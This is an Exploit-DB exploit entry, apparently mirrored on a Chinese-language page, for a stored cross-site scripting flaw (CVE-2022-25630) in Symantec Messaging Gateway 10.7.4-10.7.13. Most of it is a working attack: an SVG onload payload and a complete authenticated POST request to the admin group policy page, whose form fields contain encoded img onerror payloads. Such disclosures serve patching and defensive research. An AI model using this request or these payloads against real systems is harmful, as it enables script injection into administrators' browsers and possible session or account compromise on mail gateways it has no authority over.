Symantec Messaging Gateway 10.7.4 – Stored Cross-Site Scripting (XSS)

  • 作者: omurugur
    日期: 2023-04-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51342/
  • # Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
    # Exploit Author: omurugur
    # Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117
    # Version: 10.7.4-10.7.13
    # Tested on: [relevant os]
    # CVE : CVE-2022-25630
    # Author Web: https://www.justsecnow.com
    # Author Social: @omurugurrr
    
    
    An authenticated user can embed malicious content with XSS into the admin
    group policy page.
    
    Example payload
    
    *"/><svg/onload=prompt(document.domain)>*
    
    
    POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo
    HTTP/1.1
    Host: X.X.X.X
    Cookie: JSESSIONID=xxxxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)
    Gecko/20100101 Firefox/99.0
    Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 652
    Origin: https://x.x.x.x
    Referer:
    https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    Connection: close
    
    pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000
    
    
    Regards,
    
    Omur UGUR